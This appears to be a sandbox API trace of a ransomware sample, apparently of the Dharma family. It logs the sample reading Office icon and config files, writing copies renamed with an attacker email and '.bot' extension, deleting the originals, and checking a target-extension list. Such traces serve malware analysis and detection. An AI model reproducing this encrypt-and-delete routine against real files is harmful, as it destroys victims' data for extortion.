	[0160.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infomail.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.822] GetLastError () returned 0x0
	[0160.822] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x268, lpOverlapped=0x0) returned 1
	[0160.823] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x270, lpOverlapped=0x0) returned 1
	[0160.823] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.824] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.824] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.824] CloseHandle (hObject=0x3f0) returned 1
	[0160.824] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.824] SetEndOfFile (hFile=0x3d0) returned 1
	[0160.826] CloseHandle (hObject=0x3d0) returned 1
	[0160.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.827] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infomail.cfg")) returned 1
	[0160.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.828] lstrlenW (lpString=".doc") returned 4
	[0160.828] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.828] lstrlenW (lpString=".docx") returned 5
	[0160.828] lstrcmpiW (lpString1=".docx", lpString2="L.CFG") returned -1
	[0160.828] lstrlenW (lpString=".pdf") returned 4
	[0160.828] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.828] lstrlenW (lpString=".xls") returned 4
	[0160.828] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.828] lstrlenW (lpString=".xlsx") returned 5
	[0160.828] lstrcmpiW (lpString1=".xlsx", lpString2="L.CFG") returned -1
	[0160.828] lstrlenW (lpString=".ppt") returned 4
	[0160.828] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.828] lstrlenW (lpString=".zip") returned 4
	[0160.828] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.828] lstrlenW (lpString=".rar") returned 4
	[0160.828] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.828] lstrlenW (lpString=".bz2") returned 4
	[0160.828] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.828] lstrlenW (lpString=".7z") returned 3
	[0160.828] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.829] lstrlenW (lpString=".dbf") returned 4
	[0160.829] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.829] lstrlenW (lpString=".1cd") returned 4
	[0160.829] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.829] lstrlenW (lpString=".jpg") returned 4
	[0160.829] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.829] lstrlenW (lpString=".doc") returned 4
	[0160.829] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.829] lstrlenW (lpString=".docx") returned 5
	[0160.829] lstrcmpiW (lpString1=".docx", lpString2="L.CFG") returned -1
	[0160.829] lstrlenW (lpString=".pdf") returned 4
	[0160.829] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.829] lstrlenW (lpString=".xls") returned 4
	[0160.829] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.829] lstrlenW (lpString=".xlsx") returned 5
	[0160.829] lstrcmpiW (lpString1=".xlsx", lpString2="L.CFG") returned -1
	[0160.829] lstrlenW (lpString=".ppt") returned 4
	[0160.829] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.829] lstrlenW (lpString=".zip") returned 4
	[0160.829] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.829] lstrlenW (lpString=".rar") returned 4
	[0160.829] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.829] lstrlenW (lpString=".bz2") returned 4
	[0160.829] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.830] lstrlenW (lpString=".7z") returned 3
	[0160.830] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.830] lstrlenW (lpString=".dbf") returned 4
	[0160.830] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.830] lstrlenW (lpString=".1cd") returned 4
	[0160.830] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG") returned 66
	[0160.830] lstrlenW (lpString=".jpg") returned 4
	[0160.830] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.830] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.830] lstrlenW (lpString="INFOML.ICO") returned 10
	[0160.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.831] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=25214) returned 1
	[0160.831] CloseHandle (hObject=0x3d0) returned 1
	[0160.831] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico")) returned 0x20
	[0160.831] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.831] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.831] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.832] GetLastError () returned 0x0
	[0160.832] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x627e, lpOverlapped=0x0) returned 1
	[0160.835] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x6280, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x6280, lpOverlapped=0x0) returned 1
	[0160.836] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.836] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0160.836] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.839] CloseHandle (hObject=0x3f0) returned 1
	[0160.839] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.839] SetEndOfFile (hFile=0x3d0) returned 1
	[0160.843] CloseHandle (hObject=0x3d0) returned 1
	[0161.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.196] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico")) returned 1
	[0161.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.199] lstrlenW (lpString=".doc") returned 4
	[0161.199] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.199] lstrlenW (lpString=".docx") returned 5
	[0161.199] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.199] lstrlenW (lpString=".pdf") returned 4
	[0161.199] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.200] lstrlenW (lpString=".xls") returned 4
	[0161.200] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.200] lstrlenW (lpString=".xlsx") returned 5
	[0161.200] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.200] lstrlenW (lpString=".ppt") returned 4
	[0161.200] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.200] lstrlenW (lpString=".zip") returned 4
	[0161.200] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.200] lstrlenW (lpString=".rar") returned 4
	[0161.200] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.200] lstrlenW (lpString=".bz2") returned 4
	[0161.200] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.200] lstrlenW (lpString=".7z") returned 3
	[0161.200] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.200] lstrlenW (lpString=".dbf") returned 4
	[0161.200] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.200] lstrlenW (lpString=".1cd") returned 4
	[0161.200] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.200] lstrlenW (lpString=".jpg") returned 4
	[0161.200] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.200] lstrlenW (lpString=".doc") returned 4
	[0161.200] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.200] lstrlenW (lpString=".docx") returned 5
	[0161.200] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.200] lstrlenW (lpString=".pdf") returned 4
	[0161.201] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.201] lstrlenW (lpString=".xls") returned 4
	[0161.201] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.201] lstrlenW (lpString=".xlsx") returned 5
	[0161.201] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.201] lstrlenW (lpString=".ppt") returned 4
	[0161.201] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.201] lstrlenW (lpString=".zip") returned 4
	[0161.201] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.201] lstrlenW (lpString=".rar") returned 4
	[0161.201] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.201] lstrlenW (lpString=".bz2") returned 4
	[0161.201] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.201] lstrlenW (lpString=".7z") returned 3
	[0161.201] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.201] lstrlenW (lpString=".dbf") returned 4
	[0161.201] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.201] lstrlenW (lpString=".1cd") returned 4
	[0161.201] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO") returned 64
	[0161.201] lstrlenW (lpString=".jpg") returned 4
	[0161.201] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.201] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.202] lstrlenW (lpString="MMSL.ICO") returned 8
	[0161.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmsl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.205] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=10134) returned 1
	[0161.205] CloseHandle (hObject=0x3c4) returned 1
	[0161.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmsl.ico")) returned 0x20
	[0161.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmsl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmsl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.210] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.210] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmsl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.210] GetLastError () returned 0x0
	[0161.210] ReadFile (in: hFile=0x3b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x2796, lpOverlapped=0x0) returned 1
	[0161.219] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x27a0, lpOverlapped=0x0) returned 1
	[0161.220] ReadFile (in: hFile=0x3b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.220] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.221] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.221] CloseHandle (hObject=0x3f0) returned 1
	[0161.221] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.221] SetEndOfFile (hFile=0x3b8) returned 1
	[0161.223] CloseHandle (hObject=0x3b8) returned 1
	[0161.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmsl.ico")) returned 1
	[0161.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.224] lstrlenW (lpString=".doc") returned 4
	[0161.224] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.224] lstrlenW (lpString=".docx") returned 5
	[0161.224] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.224] lstrlenW (lpString=".pdf") returned 4
	[0161.224] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.224] lstrlenW (lpString=".xls") returned 4
	[0161.224] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.224] lstrlenW (lpString=".xlsx") returned 5
	[0161.224] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.224] lstrlenW (lpString=".ppt") returned 4
	[0161.224] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.224] lstrlenW (lpString=".zip") returned 4
	[0161.224] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.224] lstrlenW (lpString=".rar") returned 4
	[0161.224] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.224] lstrlenW (lpString=".bz2") returned 4
	[0161.224] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.224] lstrlenW (lpString=".7z") returned 3
	[0161.225] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.225] lstrlenW (lpString=".dbf") returned 4
	[0161.225] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.225] lstrlenW (lpString=".1cd") returned 4
	[0161.225] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.225] lstrlenW (lpString=".jpg") returned 4
	[0161.225] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.225] lstrlenW (lpString=".doc") returned 4
	[0161.225] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.225] lstrlenW (lpString=".docx") returned 5
	[0161.225] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.225] lstrlenW (lpString=".pdf") returned 4
	[0161.225] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.225] lstrlenW (lpString=".xls") returned 4
	[0161.225] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.225] lstrlenW (lpString=".xlsx") returned 5
	[0161.225] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.225] lstrlenW (lpString=".ppt") returned 4
	[0161.225] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.225] lstrlenW (lpString=".zip") returned 4
	[0161.225] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.225] lstrlenW (lpString=".rar") returned 4
	[0161.225] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.225] lstrlenW (lpString=".bz2") returned 4
	[0161.225] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.226] lstrlenW (lpString=".7z") returned 3
	[0161.226] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.226] lstrlenW (lpString=".dbf") returned 4
	[0161.226] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.226] lstrlenW (lpString=".1cd") returned 4
	[0161.226] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO") returned 62
	[0161.226] lstrlenW (lpString=".jpg") returned 4
	[0161.226] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.226] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.226] lstrlenW (lpString="NOTEL.ICO") returned 9
	[0161.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notel.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.229] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0161.229] CloseHandle (hObject=0x3b8) returned 1
	[0161.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notel.ico")) returned 0x20
	[0161.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notel.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notel.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0161.229] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.229] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
